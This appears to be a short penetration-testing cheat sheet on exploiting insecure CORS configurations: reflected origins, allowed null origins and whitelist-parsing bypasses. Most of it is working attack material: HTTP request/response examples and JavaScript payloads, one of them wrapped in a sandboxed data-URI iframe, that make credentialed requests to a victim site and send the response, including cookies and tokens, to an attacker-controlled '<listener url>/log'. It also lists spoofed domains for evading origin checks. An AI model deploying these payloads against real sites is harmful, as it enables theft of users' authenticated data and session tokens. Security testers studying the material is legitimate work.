CORS
Insecure configurations
Access allowed from any domain
Request
GET <trget url> HTTP/1.1
Host: <target url>
Origin: <listener url>Response
HTTP/1.1 200 OK
Access-Control-Allow-Origin: <listener url>
Access-Control-Allow-Credentials: truePayload
Place this script on a controlled website. When a user hits the website the script sends a request and stores the response including cookies and tokens at <listener url>/log. By navigating to this url an attacker is able to read the full content of the response
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','<url>',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='<listener url>/log'+this.responseText;
};Allowed NULL Origin
Request
GET <url> HTTP/1.1
Host: <url>
Origin: nullResponse
HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: truePayload
Include the script in an iframe so that the Origin is set to null
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','<url>',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='<listener url>/log?key='+this.responseText;
};
</script>"></iframe>CORS Headers parsing error
To attempt to bypass CORS Origin whitelist it is possible to modify the server's name to include part of the target subdomain in order to spoof detection for instance:
Allowed any from domain: site.com
evil-site.com #CORS check only the end
site-evil.com #CORS check only the beginning
site.evil.com #CORS check only top domainLast updated